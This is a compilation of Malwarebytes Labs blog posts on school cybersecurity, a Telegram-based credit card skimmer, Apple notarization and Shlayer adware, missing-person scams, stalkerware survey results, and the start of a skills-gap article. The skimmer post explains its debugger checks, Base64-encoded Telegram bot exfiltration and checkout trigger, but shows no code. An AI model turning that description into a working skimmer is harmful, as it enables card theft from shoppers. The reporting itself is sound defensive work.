IT NEWS

How to keep K–12 distance learners cybersecure this school year

With the pandemic still in full swing, educational institutions across the US are kicking off the 2020–2021 school year in widely different ways, from re-opening classrooms to full-time distance learning. Sadly, as schools embracing virtual instruction struggle with compounding IT challenges on top of an already brittle infrastructure, they are nowhere near closing the K-12 cybersecurity gap.

Kids have no choice but to continue their studies within the current social and health climate. On top of this, they must get used to new learning setups—possibly multiple ones—whether they’re full-on distance learning, homeschooling, or a hybrid of in-class and home instruction.

Regardless of which of these setups school districts, parents, or guardians decide are best suited for their children, one thing should remain a priority: the overall security of students’ learning experience during the pandemic. For this, many careful and considerable preparations are needed.

New term, new terms

Parents in the United States are participating in their children’s learning like never before—and that was before the pandemic forced their hand. Now more than ever, it’s important to become familiar with the different educational settings to consider which is best suited for their family.

Full-on distance learning

Classes are held online while students are safe in their own homes. Teachers may offer virtual classes out of their own homes as well, or they may be using their empty classrooms for better bandwidth.

This setup requires families to have, ideally, a dedicated laptop or computer students can use for class sessions and independent work. In addition, a strong Internet connection is necessary to support both students and parents working from home. However, children in low-income families may have difficulties accessing this technology, unless the school is handing out laptops and hot spot devices for Wi-Fi. Often, there are delays distributing equipment and materials—not to mention a possible learning curve thanks to the Digital Divide.

Full-on distance learning provides children with the benefit of teacher instruction while being safe from exposure to the coronavirus.

Homeschool learning or homeschooling

Classes are held at home, with the parent or guardian acting as teacher, counselor, and yes, even IT expert to their kids. Nowadays, this setup is often called temporary homeschooling or emergency homeschooling. Although this is a viable and potentially budget-friendly option for some families, note that unavoidable challenges may arise along the way. This might be especially true for older children who are more accustomed to using technology in their studies.

This isn’t to say that the lack of technology use when instructing kids would result in low quality of learning. In fact, a study from Tilburg University [PDF] on the comparison between traditional learning and digital learning among kids ages 6 to 8 showed that children perform better when taught the traditional way—although, the study further noted, that they are more receptive to digital learning methods. But perhaps the most relevant implication from the study is this: The role of teachers (in this article’s context, the parents and guardians) in achieving desirable learning outcomes continues to be a central factor.

Parents and guardians may be faced with the challenge of out-of-the-box-thinking when it comes to creating valuable lessons for their kids that target their learning style while keeping them on track for their grade level.

Hybrid learning

This is a combination of in-class and home instruction, wherein students go to school part-time with significant social distancing and safety measures, such as wearing masks, regular sanitizing of facilities and properties, and regular cleaning of hands. Students may be split into smaller groups, have staggered arrival times, and spend only a portion of their week in the classroom.

For the rest of students’ time, parents or guardians are tasked with continuing instruction at home. During these days or hours, parents or guardians must grapple with the same stressors on time, creativity, patience, and digital safety as those in distance learning and homeschooling models.

New methods of teaching and learning might be borne out of the combination of any or all three setups listed above. But regardless of how children must continue their education—with the worst or best of circumstances in mind—supporting their emotional and mental well-being is a priority. To achieve peace of mind and keep students focused on instruction, parents must also prioritize securing their children’s devices from online threats and the invasion of privacy.

Old threats, new risks

It’s a given that the learning environments that expose children to online threats and risk their privacy the most involve the use of technology. Some are familiar, and some are born from the changes introduced by the pandemic. Let’s look at the risk factors that make K-12 cybersecurity essential in schools and in homes.

Zoombombing. This is a cyberthreat that recently caught steam due to the increased use of Zoom, a now-popular web conference tool. Employees, celebrities, friends, and family have used this app (and apps like it) to communicate in larger groups. Now it’s commonly adopted by schools for virtual instruction hours.

Since shelter-in-place procedures were enforced, stories of Zoombombing incidents have appeared left and right. Take, for example, the case of the unknown man who hacked into a Berkeley virtual class over Zoom to expose himself to high school students and shout obscenities. What made this case notable was the fact that the teacher of that class followed the recommended procedures to secure the session, yet a breach still took place.

Privacy issues. When it comes to children’s data, privacy is almost always the top issue. And there are many ways such data can be compromised: from organizational data breaches—something we’re all too familiar with at this point—to accidental leaking to unconsented data gathering from tools and/or apps introduced in a rush.

An accidental leaking incident happened in Oakland when administrators inadvertently posted hundreds of access codes and passwords used in online classes and video conferences to the public, allowing anyone with a Gmail account to not only join these classes but access student data.

In April 2020, a father filed a case against Google on behalf of his two kids for violating the Children’s Online Privacy Protection Act (COPPA) and the Biometric Information Privacy Act (BIPA) of Illinois. The father, Clinton Farwell, alleges that Google’s G Suite for Education service collects the data—their PII and biometrics—of children, who are aged 13 and below, to “secretly and unlawfully monitor and profile children, but to do so without the knowledge or consent of those children’s parents.”

This happened two months after Hector Balderas, the attorney general of New Mexico, filed a case against the company for continuing to track children outside the classroom.

Ransomware attacks. Educational institutions aren’t immune to ransomware attacks. Panama-Buena Vista Union School. Fort Worth Independent. Crystal Lake Community High School. These are just some of the total districts—284 schools in all—that were affected by ransomware from the start of 2020 until the first week of April. Unfortunately, the pandemic won’t make them less of a target—only more.

With a lot of K-12 schools adjusting to the pandemic—often introducing tools and apps that cater to remote learning without conducting security audits—it is almost expected that something bad is going to happen. The mad scrambling to address the sudden change in demand only shows how unprepared these school districts were. It’s also unfortunate that administrative staff have to figure things out and learn by themselves on how to better protect student data, especially if they don’t have a dedicated IT team. And, often, that learning curve is quite steep.

Phishing scams. In the context of the education industry, phishing scams have always been an ever-present threat. According to Doug Levin, the founder and president of the K-12 Cybersecurity Resource Center, schools are subjected to “drive-by” phishing, in particular.

“Scammers and criminals really understand the human psyche and the desire for people to get more information and to feel in some cases, I think it’s fair to say in terms of coronavirus, some level of panic,” Levin said in an interview with EdWeek. “That makes people more likely to suspend judgment for messages that might otherwise be suspicious, and more likely to click on a document because it sounds urgent and important and relevant to them, even if they weren’t expecting it.”

Security tips for parents and guardians

To ensure distance learning and homeschooled students have an uninterrupted learning experience, parents or guardians should make sure that all the tools and gadgets their kids use to start school are prepared. In fact, doing so is similar to how to keep work devices secure while working from home. For clarity’s sake, let’s flush out some general steps, shall we?

Secure your Wi-Fi

  • Make sure that the router or the hotspot is using a strong password. Not only that, switch up the password every couple months to keep it fresh.
  • Make sure that all firmware is updated.
  • Change the router’s admin credentials.
  • Turn on the router’s firewall.

Secure their device(s)

  • Make sure students’ computers or other devices are password-protected and lock automatically after a short period of time. This way, work won’t be lost by a pet running wild or a curious younger sister smashing some buttons.

    For schools that issue student laptops, the most common operating system is ChromeOS (Chromebooks). Here’s a simple and quick guide on how parents and guardians can lock Chromebooks. The password doesn’t need to be complicated, as you and your child should be able to remember it. Decide on a pass phrase together, but don’t share it with the other kids in the house.

  • Ensure that the firewall is enabled in the device.
  • Enforce two-factor authentication (2FA).
  • Ensure that the device has end-point protection installed and running in real time.

Secure your child’s data

  • Schools use a learning management solution (LMS) to track children’s activities. It is also what kids use to access resources that they need for learning.

    Make sure that your child’s LMS password follows the school’s guidelines on how to create a high entropy password. If the school doesn’t specify strong password guidelines, create a strong password yourself. Password managers can usually do this for you if you feel that thinking up a complicated one and remembering it is too much of a chore.

  • It also pays to limit the use of the device your child uses for studying to only schoolwork. If there are other devices in the house, they can be used to access social media, YouTube, video games, and other recreational activities. This will lessen their chances of encountering an online threat on the same device that stores all their student data.

Secure your child’s privacy

There was a case before where a school accidentally turned the cameras on of school-issued devices the students were using. It blew up in the news because it greatly violated one’s privacy. Although this may be considered a rare incident, assume that you can’t be too careful when the device your kid uses has a built-in camera.

Students are often required to show their faces on video conference software so teachers know they are paying attention. But for all the other time spent on assignments, it’s a good idea to cover up built-in cameras. There are laptop camera covers parents or guardians can purchase to slide across the lens when it’s not in use.

New challenges, new opportunities to learn

While education authorities have had their hands full for months now, parents and guardians can do their part, too, by keeping their transition to a new learning environment as safe and frictionless as possible. As you may already know, some states have relaxed their lockdown rules, allowing schools to re-open. However, the technology train has left the station.

Even as in-person instruction continues, educational tech will become even more integral to students’ learning experiences. Keeping those specialized software suites, apps, communication tools, and devices safe from cyberthreats and privacy invasions will be imperative for all future generations of learners.

Safe, not sorry

While IT departments in educational institutions continue to wrestle with current cybersecurity challenges, parents and guardians have to step up their efforts and contribute to K-12 cybersecurity as a whole. Lock down your children’s devices, whether they use them in the classroom or at home. True, it will not guarantee 100 percent protection from cybercriminals, but at the very least, you can be assured that your kids and their devices will remain far out of reach.

Stay safe!

The post How to keep K–12 distance learners cybersecure this school year appeared first on Malwarebytes Labs.

New web skimmer steals credit card data, sends to crooks via Telegram

The digital credit card skimming landscape keeps evolving, often borrowing techniques used by other malware authors in order to avoid detection.

As defenders, we look for any kind of artifacts and malicious infrastructure that we might be able to identify to protect our users and alert affected merchants. These malicious artifacts can range from compromised stores to malicious JavaScript, domains, and IP addresses used to host a skimmer and exfiltrate data.

One such artifact is a so-called “gate,” which is typically a domain or IP address where stolen customer data is being sent and collected by cybercriminals. Typically, we see threat actors either stand up their own gate infrastructure or use compromised resources.

However, there are variations that involve abusing legitimate programs and services, thereby blending in with normal traffic. In this blog, we take a look at the latest web skimming trick, which consists of sending stolen credit card data via the popular instant messaging platform Telegram.

An otherwise normal shopping experience

We are seeing a large number of e-commerce sites attacked either through a common vulnerability or stolen credentials. Unaware shoppers may visit a merchant that has been compromised with a web skimmer and make a purchase while unknowingly handing over their credit card data to criminals.

Skimmers insert themselves seamlessly within the shopping experience and only those with a keen eye for detail or who are armed with the proper network tools may notice something’s not right.

diagram
Figure 1: Credit card skimmer using Telegram bot

The skimmer will become active on the payment page and surreptitiously exfiltrate the personal and banking information entered by the customer. In simple terms, things like name, address, credit card number, expiry, and CVV will be leaked via an instant message sent to a private Telegram channel.

Telegram-based skimmer

Telegram is a popular and legitimate instant messaging service that provides end-to-end encryption. A number of cybercriminals abuse it for their daily communications but also for automated tasks found in malware.

Attackers have used Telegram to exfiltrate data before, for example via traditional Trojan horses, such as the Masad stealer. However, security researcher @AffableKraut shared the first publicly documented instance of a credit card skimmer used in Telegram in a Twitter thread.

The skimmer code keeps with tradition in that it checks for the usual web debuggers to prevent being analyzed. It also looks for fields of interest, such as billing, payment, credit card number, expiration, and CVV.

skimmer1
Figure 2: First part of the skimmer code

The novelty is the presence of the Telegram code to exfiltrate the stolen data. The skimmer’s author encoded the bot ID and channel, as well as the Telegram API request with simple Base64 encoding to keep it away from prying eyes.

skimmer1b
Figure 3: Skimming code containing Telegram’s API

The exfiltration is triggered only if the browser’s current URL contains a keyword indicative of a shopping site and when the user validates the purchase. At this point, the browser will send the payment details to both the legitimate payment processor and the cybercriminals.

telegram
Figure 4: A purchase where credit card data is stolen and exfiltrated

The fraudulent data exchange is conducted via Telegram’s API, which posts payment details into a chat channel. That data was previously encrypted to make identification more difficult.

For threat actors, this data exfiltration mechanism is efficient and doesn’t require them to keep up infrastructure that could be taken down or blocked by defenders. They can even receive a notification in real time for each new victim, helping them quickly monetize the stolen cards in underground markets.

Challenges with network protection

Defending against this variant of a skimming attack is a little more tricky since it relies on a legitimate communication service. One could obviously block all connections to Telegram at the network level, but attackers could easily switch to another provider or platform (as they have done before) and still get away with it.

Malwarebytes Browser Guard will identify and block this specific skimming attack without disabling or interfering with the use of Telegram or its API. So far we have only identified a couple of online stores that have been compromised with this variant, but there are likely several more.

block
Figure 5: Malwarebytes blocking this skimming attack

As always, we need to adapt our tools and methodologies to keep up with financially-motivated attacks targeting e-commerce platforms. Online merchants also play a huge role in derailing this criminal enterprise and preserving the trust of their customer base. By being proactive and vigilant, security researchers and e-commerce vendors can work together to defeat cybercriminals standing in the way of legitimate business.

The post New web skimmer steals credit card data, sends to crooks via Telegram appeared first on Malwarebytes Labs.

Lock and Code S1Ep14: Uncovering security hubris with Adam Kujawa

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Adam Kujawa, security evangelist and director of Malwarebytes Labs, about “security hubris,” the simple phenomenon in which businesses are less secure than they actually believe.

Ask yourself, right now, on a scale from one to ten, how cybersecure are you? Now, do you have any reused passwords for your online accounts? Does your home router still have its default password? If your business rolled out new software for you to use for working from home (WFH), do you know if those software platforms are secure?

If your original answer is looking a little more shaky, don’t be surprised. That is security hubris

Tune in to hear about the dangers of security hubris to a business, how to protect against it, and about how Malwarebytes found it within our most recent report, “Enduring from home: COVID-19’s impact on business security,” on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes storeGoogle Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

Other cybersecurity news:

  • The US government issued a warning about North Korean hackers targeting banks worldwide. (Source: BleepingComputer)
  • A team of academics from Switzerland has discovered a security bug that can be abused to bypass PIN codes for Visa contactless payments. (Source: ZDNet)
  • For governments and armed forces around the world, the digital domain has become a potential battlefield. (Source: Public Technology)
  • A new hacker hacker-for-hire group is targeting organizations worldwide with malware hidden inside malicious 3Ds Max plugins. (Source: Security Affairs)
  • The Qbot trojan evolves to hijack legitimate email threads. (Source: BetaNews)

Stay safe, everyone!

The post Lock and Code S1Ep14: Uncovering security hubris with Adam Kujawa appeared first on Malwarebytes Labs.

Apple’s notarization process fails to protect

In macOS Mojave, Apple introduced the concept of notarization, a process that developers can go through to ensure that their software is malware-free (and must go through for their software to run on macOS Catalina). This is meant to be another layer in Apple’s protection against malware. Unfortunately, it’s starting to look like notarization may be less security and more security theater.

What is notarization?

Notarization goes hand-in-hand with another security feature: code signing. So let’s talk about that first.

Code signing is a cryptographic process that enables a developer to provide authentication to their software. It both verifies who created the software and verifies the integrity of the software. By code signing an app, developers can (to some degree) prevent it from being modified maliciously—or at the very least, make such modifications easily detectable.

The code signing process has been integral to Mac software development for years. The user has to jump through hoops to run unsigned software, so little mainstream Mac software today comes unsigned.

However, Mac software that is distributed outside the App Store never had to go through any kind of checks. This meant that malware authors would obtain a code signing certificate from Apple (for a mere $99) and use that to sign their malware, enabling it to run without trouble. Of course, when discovered, Apple can revoke the code signing certificate, thus neutralizing the malware. However, malware can often go undiscovered for years, as illustrated best by the FruitFly malware, which went undetected for at least 10 years.

In light of this problem, Apple created a process they call “notarization.” This process involves developers submitting their software to Apple. That software goes through some kind of automated scan to ensure it doesn’t contain malware, and then is either rejected or notarized (i.e., certified as malware-free by Apple—in theory).

In macOS Catalina, software that is not notarized is prevented from running at all. If you try, you will simply be told “do not pass Go, do not collect $200.” (Or in Apple’s words, it can’t be opened because “Apple cannot check it for malicious software.”)

The message displayed by Catalina for older versions of Spotify
The message displayed by Catalina for older versions of Spotify

There are, of course, ways to run software that is not signed or not notarized, but there’s no indication as to how this is done from the error message, so as far as legitimate developers are concerned, it’s not an option.

So how’s that working out so far?

The big question on everyone’s minds when notarization was announced at Apple’s WWDC conference in 2019, was, “How effective is this going to be?” Many were quite optimistic that this would spell the end of Mac malware once and for all. However, those of us in the security industry did not drink the Kool-Aid. Turns out, our skepticism was warranted.

There are a couple tricks that the bad guys are using, in light of the new requirements. One is simple: Don’t sign or notarize the apps at all.

We’re seeing quite a few cases where malware authors have stopped signing their software, and have instead been shipping it with instructions to the user on how to run it.

Unsigned Mac malware

As can be seen from the above screenshot, the malware comes on a disk image (.dmg) file with a custom background. That background image shows instructions for opening the software, which is neither signed nor notarized.

The irony here is that we see lots of people getting infected with this malware—a variant of the Shlayer or Bundlore adware, depending on who you ask—despite the minor difficulty of opening it. Meanwhile, the installation of security software on macOS has gotten to be so difficult that we get a fair number of support cases about it.

The other option, of course, is for threat actors to get their malware notarized.

Notarize malware?! Say it ain’t so!

In theory, the notarization process is supposed to weed out anything malicious. In practice, nobody really understands exactly how notarization works, and Apple is not inclined to share details. (For good reason—if they told the bad guys how they were checking for malware, the bad guys would know how to avoid getting caught by those checks.)

All developers and security researchers know is that notarization is fast. I’ve personally notarized software quite a few times at this point, and it usually takes less than a couple minutes between submission and receipt of the e-mail confirming success of notarization. That means there’s definitely no human intervention involved in the process, as there is with App Store reviews. Whatever it is, it’s solely automated.

I’ve assumed since notarization was first introduced that it would turn out to be fallible. I’ve even toyed with the idea of testing this process, though the risk of getting my developer account “Charlie Millered” has prevented me from doing so. (Charlie Miller is a well-known security researcher who created a proof-of-concept malware app and got it into the iOS App Store in 2011. Even though he notified Apple after getting the app approved, Apple still revoked his developer account and he has been banned from further Apple development activity ever since.)

It turns out, though, that all I had to do was wait for the bad guys to run the test for me. According to new findings, Mac security researcher Patrick Wardle has discovered samples of the Shlayer adware that are notarized. Yes, that’s correct. Apple’s notarization process has allowed known malware to pass through undetected, and to be implicitly vouched for by Apple.

How did they do that?

We’re still not exactly sure what the Shlayer folks did to get their malware notarized, but increasingly, it’s looking like they did nothing at all. On the surface, little has changed.

Comparison of two Shlayer installers

The above screenshot shows a notarized Shlayer sample on the left, and an older one on the right. There’s no difference at all in the appearance. But what about when you dive into the code?

Comparison of the code of two Shlayer samples

This screenshot is hardly a comprehensive look into the code. It simply shows the entry point, and the names of a number of the functions found in the code. Still, at this level, any differences in the code are minor.

It’s entirely possible that something in this code, somewhere, was modified to break any detection that Apple might have had for this adware. Without knowing how (if?) Apple was detecting the older sample (shown on the right), it would be quite difficult to identify whether any changes were made to the notarized sample (on the left) that would break that detection.

This leaves us facing two distinct possibilities, neither of which is particularly appealing. Either Apple was able to detect Shlayer as part of the notarization process, but breaking that detection was trivial, or Apple had nothing in the notarization process to detect Shlayer, which has been around for a couple years at this point.

What does this mean?

This discovery doesn’t change anything from my perspective, as a skeptical and somewhat paranoid security researcher. However, it should help “normal” Mac users open their eyes and recognize that the Apple stamp does not automatically mean “safe.”

Apple wants you to believe that their systems are safe from malware. Although they no longer run the infamous “Macs don’t get viruses” ads, Apple never talks about malware publicly, and loves to give the impression that its systems are secure. Unfortunately, the opposite has been proven to be the case with great regularity. Macs—and iOS devices like iPhones and iPads, for that matter—are not invulnerable, and their built-in security mechanisms cannot protect users completely from infection.

Don’t get me wrong, I still use and love Mac and iOS devices. I don’t want to give the impression that they shouldn’t be used at all. It’s important to understand, though, that you must be just as careful with what you do with your Apple devices as you would be with your Windows or Android devices. And when in doubt, an extra layer of anti-malware protection goes a long way in providing peace of mind.

The post Apple’s notarization process fails to protect appeared first on Malwarebytes Labs.

Missing person scams: what to watch out for

Social media has a long history of people asking for help or giving advice to other users. One common feature is the ubiquitous “missing person” post. You’ve almost certainly seen one, and may well have amplified such a Facebook post, or Tweet, or even blog.

The sheer reach and virality of social media is perfect for alerting others. It really is akin to climbing onto a rooftop with a foghorn and blasting out your message to the masses. However, the flipside is an ugly one.

Social media is also a breeding ground for phishers, scammers, trolls, and domestic abusers working themselves into missing person narratives. When this happens, there can be serious consequences.

“My friend is missing, please retweet…”

Panicked, urgent requests for information are how these missing person scams spread. They’re very popular on social media and can easily spread across the specific geographically-located demographic the message needs to go to.

If posted to platforms other than Twitter, they may well also come with a few links which offer additional information. The links may or may not be official law enforcement resources.

Occasionally, links lead to dedicated missing person detection organisations offering additional services.

You may well receive a missing person notice or request through email, as opposed something posted to the wider world at large.

All useful ways to get the word out, but also very open to exploitation.

How can this go wrong?

The ease of sharing on social media is also the biggest danger where missing person requests are concerned. If someone pops up in your timeline begging for help to find a relative who went missing overnight, the impulse to share is very strong. It takes less than a second to hit Retweet or share, and you’ve done your bit for the day.

However.

If you’re not performing due diligence on who is doing the sharing, this could potentially endanger the person in the images. Is the person sharing the information directly a verified presence on the platform you’re using, or a newly created throwaway account?

If they are verified, are they sharing it from a position of personal interest, or simply retweeting somebody else? Do they know the person they’re retweeting, or is it a random person? Do they link to a website, and is it an official law enforcement source or something else altogether?

Even if the person sharing it first-hand is verified or they know the person they’re sharing content  from, that doesn’t mean what you’re seeing is on the level.

What if the non-verified person is a domestic abuser, looking for an easy way to track down someone who’s escaped their malign presence? What if the verified individual is the abuser? We simply don’t know, but by the time you may have considered this the Tweet has already been and gone.

When maliciousness is “Just a prank, bro”

Even if the person asking to find somebody isn’t some form of domestic abuser, there’s a rapidly sliding scale of badness waiting to pounce. Often, people will put these sorts of requests out for a joke, or as part of a meme. They’ll grab an image most likely well known in one geographic region but not another, and then share asking for information. This can often bleed into other memes.

“Have you seen this person, they stole my phone and didn’t realise it took a picture” is a popular one, often at the expense of a local D-list celebrity. In the same way, people will often make bad taste jokes but related to missing children. To avoid the gag being punctured early, they may avoid using imagery from actual abduction cases and grab a still from a random YouTube clip or something from an image resource.

A little girl, lost in Doncaster?

One such example of this happened in the last few weeks. A still image appeared to show a small child in distress, bolted onto a “missing” plea for help.

Well, she really was in distress…but as a result of an ice hockey player leaving his team in 2015, and not because she’d gone missing or been abducted. There’s a link provided claiming to offer CCTV footage of a non-existent abduction, though reports don’t say where the links took eager clickers.

A panic-filled message supplied with a link is a common tactic in these realms. The same thing happened with a similar story in April of 2019. Someone claimed their 10-year-old sister had gone missing outside school after an argument with her friend. However, it didn’t take long for the thread to unravel. Observant Facebook users noted that schools would have been closed on the day it supposedly happened.

Additionally, others mentioned that they’d seen the same missing sister message from multiple Facebook profiles. As with the most recent fake missing story, we don’t know where the link wound up. People understandably either steered clear or visited but didn’t take a screenshot and never spoke of it again.

“My child is missing”: an eternally popular scam

There was another one doing the rounds of June this year, once more claiming a child was missing. The seemingly US-centric language-oriented page appeared for British users in Lichfield, Bloxeich, Wolverhampton, and Walsall. Mentioning “police captains” and “downtown” fairly gave the game away, hinting at its generic cut and paste origins. The fact it cites multiple conflicting dates as to when the kidnapping took place is also a giveaway.

This one was apparently a Facebook phish, and was quite successful in 2020. So much so, that it first appeared in March, and then May before putting in its June performance. Scammers continue to use it because it’s easy to throw together, and it works.

Exploiting a genuine request

It’s not just scammers taking the lead and posting fake missing person scam posts. They’ll also insert themselves into other people’s misery and do whatever they can to grab some ill-gotten gains. An example of this dates to 2013, where someone mentions that they’d tried to reunite with their long-lost sister, via a “Have you seen this person” style letter.

The letter was published in a magazine, and someone got in touch. Unfortunately, that person claimed they held the sister hostage and needed to pay a ransom. The cover story quickly fell apart after they claimed certain relatives where dead when they were alive, and the missing person scam was foiled. 

Here’s a similar awful scam from 2016, where Facebook scammers claimed someone’s missing daughter was a sex worker in Atlanta. They said she was being trafficked and could be “bought back” for $70,000. A terrible thing to tell someone, but then these people aren’t looking to play fair.

Fake detection agencies

Some of these fakes will find you via post-box, as opposed merely lurking online. There have been cases where so-called “recovery bureaus” drop you a note claiming to be able to lead you to missing people. When you meet up with arranged contacts though, the demands for big slices of cash start coming. What information they do have is likely publicly sourced or otherwise easily obtainable (and not worth the asking price).

Looking for validation

Helping people is great and assisting on social media is a good thing. We just need to be careful we’re aiding the right people. While it may not always be possible for a missing person alert to come directly from an official police source, it would be worth taking a little bit of time to dig into the message, and the person posting it, before sharing further.

The issue of people going missing is bad enough; we shouldn’t look to compound misery by unwittingly aiding people up to no good.

The post Missing person scams: what to watch out for appeared first on Malwarebytes Labs.

Good news: Stalkerware survey results show majority of people aren’t creepy

Back in July, we sent out a survey to Malwarebytes Labs readers on the subject of stalkerware—the term used to describe apps that can potentially invade someone’s privacy. We asked one question: “Have you ever used an app to monitor your partner’s phone?” 

The results were reassuring.

We received 4,578 responses from readers all over the world to our stalkerware survey and the answer was a resounding “NO.” An overwhelming 98.23 percent of respondents said they had not used an app to monitor their partner’s phone.

Chart Q1 200820

For our part, Malwarebytes takes stalkerware seriously. We’ve been detecting apps with monitoring capabilities for more than six years—now Malwarebytes for WindowsMac, or Android detects and allows users to block applications that attempt to monitor your online behavior and/or physical whereabouts without your knowledge or consent. Last year, we helped co-found the Coalition Against Stalkerware with the Electronic Frontier Foundation, the National Network to End Domestic Violence, and several other AV vendors and advocacy groups.

It stands to reason that a readership comprised of Malwarebytes customers and people with a strong interest in cybersecurity would say “no” to stalkerware—we’ve spoken up about the potential privacy concerns associated with using these apps and the danger of equipping software with high-grade surveillance capabilities for a long time. We didn’t want to assume everyone agreed with us, but the data from our stalkerware survey shows our instincts were right.

No to stalkerware

Beyond a simple yes or no, we also asked our survey-takers to explain why they answered the way they did. The most common answer by far was a mutual respect and trust for their partner. In fact, “respect,” “trust,” and “privacy” were the three most commonly-used words by our participants in their responses:

“My partner and I share our lives … To monitor someone else’s phone is a tragic lack of trust.”

Many of those surveyed cited the Golden Rule (treat others the way you want to be treated) as their reason for not using stalkerware-type apps:

“I wouldn’t want anyone to monitor me so I therefore I would not monitor them.”

Others saw it as a clear-cut issue of ethics:

“People are entitled to their privacy as long as they do not do things that are illegal. Their rights end at the beginning of mine.”

Some respondents shared harrowing real-life accounts of being a victim of stalkerware or otherwise having their privacy violated:

“I have been a victim of stalking several times when vicious criminals used my own surveillance cameras to spy on my activity then used it to break into my apartment.”

Stalkerware vs. location sharing vs. parental monitoring

Many of those surveyed, answering either yes or no, made a distinction between stalkerware-type apps writ large and location-sharing apps like Apple’s Find My Phone and Google Maps. Location sharing was generally considered acceptable because users volunteered to share their own information and sharing was limited to their current location.

“My wife & myself allow Apple Find My Phone to track each other if required. I was keen that should I not arrive home from a run, she could find out where I was in the case of a health issue or accident.”

Also considered okay by our respondents were the types of parental controls packaged in by default with their various devices. Many respondents specifically mentioned tracking their child’s location:

“It would not be ok with me if someone was monitoring me and I would never do it to anyone else, the only thing I would like is be able to track my child if kidnapped.”

Some parents admitted to using monitoring of some kind with their children, but it wasn’t clear how far they were willing to go and if children were aware they were being monitored:

“The only reason I have set up parental control for my son is for his safety most importantly.”

This is the murky world of parental-monitoring apps. On one end of the spectrum there are the first-party parental controls like those built into the iPhone and Nintendo Switch. These controls allow parents to restrict screen time and approve games and additional content on an ad hoc basis. Then there are third-party apps, which provide limited capabilities to track one thing and one thing only, like, say, a child’s location, or their screen time, or the websites they are visiting.

On the other end of the spectrum, there are apps in the same parental monitoring category that can provide a far broader breadth of monitoring, from tracking all of a child’s interactions on social media to using a keylogger that might even reveal online searches meant to stay private. 

You can hear more about our take on these apps in our latest podcast episode, but the long and the short of it is that Malwarebytes doesn’t recommend them, as they can feature much of the same high-tech surveillance capabilities of nation-state malware and stalkerware, but often lack basic cybersecurity and privacy measures.

Who said ‘yes’ to stalkerware?

Of course, our stalkerware survey analysis would not be complete without taking a look at the 81 responses from those who said “yes” to using apps to monitor their partners’ phone.

Again, the majority of respondents made a distinction between consensual location-sharing apps and the more intrusive types of monitoring that stalkerware can provide. Many of those who answered “yes” to using an app to monitor their partner’s phone said things like:

“My wife and I have both enabled Google’s location sharing service. It can be useful if we need to know where each other is.”

And:

“Only the Find My iPhone app. My wife is out running or hiking by herself quite often and she knows I want to know if she is safe.”

Of the 81 people who said they use apps to monitor their partners’ phones, only nine cited issues of trust, cheating, “being lied to” or “change in partner’s behavior.” Of those nine, two said their partner agreed to install the app.

NortonLifeLock’s online creeping study

The results of the Labs stalkerware survey are especially interesting when compared to the Online Creeping Survey conducted by NortonLifeLock, another founding member of the Coalition Against Stalkerware.

This survey of more than 2,000 adults in the United States found that 46 percent of respondents admitted to “stalking” an ex or current partner online “by checking in on them without their knowledge or consent.”

Twenty-nine percent of those surveyed admitted to checking a current or former partner’s phone. Twenty-one percent admitted to looking through a partner’s search history on one of their devices without permission. Nine percent admitted to creating a fake social media profile to check in on their partners.

When compared to the Labs stalkerware survey, it would seem that online stalking is considered more acceptable when couched under the term “checking in.” For perspective, if one were to swap the word “diary” for “phone,” we don’t think too many people would feel comfortable admitting, “Hey, I’m just ‘checking in’ on my girlfriend/wife’s diary. No big deal.”

Stalkerware in a pandemic

Finally, we can’t end this piece without at least acknowledging the strange and scary times we’re living in. Shelter-in-place orders at the start of the coronavirus pandemic became de facto jail sentences for stalkerware and domestic violence victims, imprisoning them with their abusers. No surprise, The New York Times reported an increase in the number of domestic violence victims seeking help since March.

For some users, however, the pandemic has brought on a different kind of suffering. One survey respondent best summed up the current malaise of anxiety, fear, and depression: 

“No partner to monitor lol.”

We like to think, dear reader, that they’re not laughing at themselves and the challenges of finding a partner during COVID. Rather, they’re laughing at all of us.

Stalkerware resources

As mentioned earlier, Malwarebytes for WindowsMac, or Android will detect and let users remove stalkerware-type applications. And if you think you might have stalkerware on your mobile device, be sure to check out our article on what to do when you find stalkerware or suspect you’re the victim of stalkerware.

Here are a few other important reads on stalkerware:

Stalkerware and online stalking are accepted by Americans. Why?

Stalkerware’s legal enforcement problem

Awareness of stalkerware, monitoring apps, and spyware on the rise

How to protect against stalkerware

The post Good news: Stalkerware survey results show majority of people aren’t creepy appeared first on Malwarebytes Labs.

The cybersecurity skills gap is misunderstood

Nearly every year, a trade association, a university, an independent researcher, or a large corporation—and sometimes all of them and many in between—push out the latest research on the cybersecurity skills gap, the now-decade-plus-old idea that the global economy lacks a growing number of cybersecurity professionals who cannot be found.

It is, as one report said, a “state of emergency.” It would be nice, then, if the numbers made more sense.

In 2010, according to one study focused on the United States, the cybersecurity skills gap included at least 10,000 individuals. In 2015, according to a separate analysis, that number was 209,000. Also, in 2015, according to yet another report, that number was more than 1 million. Today, that number is both a projected 3.5 million by 2021 and a current 4.07 million, worldwide.

PK Agarwal, dean of the University of California Santa Cruz Silicon Valley Extension, has followed these numbers for years. He followed the data in personal interest, and he followed it more deeply when building programs at Northeastern University Silicon Valley, the educational hub opened by the private Boston-based university, where he most recently served as regional dean and CEO. During his research, he uncovered something.

“In terms of actual numbers, if you’re looking at the supply and demand gap in cybersecurity, you’ll see tons of reports,” Agarwal said. “They’ll be all over the map.”

He continued: “Yes, there is a shortage, but it is not a systemic shortage. It is in certain sweet spots. That’s the reality. That’s the actual truth.”

Like Agarwal said, there are “sweet spots” of truth to the cybersecurity skills gap—there can be difficulties in finding immediate need on deadline-driven projects, or in finding professionals trained in a crucial software tool that a company cannot spend time training current employees on.

But more broadly, the cybersecurity skills gap, according to recruiters, hiring managers, and academics, is misunderstood. Rather than a lack of talent, there is sometimes, on behalf of companies, a lack of understanding in how to find and hire that talent.

By posting overly restrictive job requirements, demanding contradictory skillsets, refusing to hire remote workers, offering non-competitive rates, and failing to see minorities, women, and veterans as viable candidates, businesses could miss out on the very real, very accessible cybersecurity talent out there.

In other words, if you are not able to find a cybersecurity expert for your company, that doesn’t mean they don’t exist. It means you might need help in finding them.

Number games

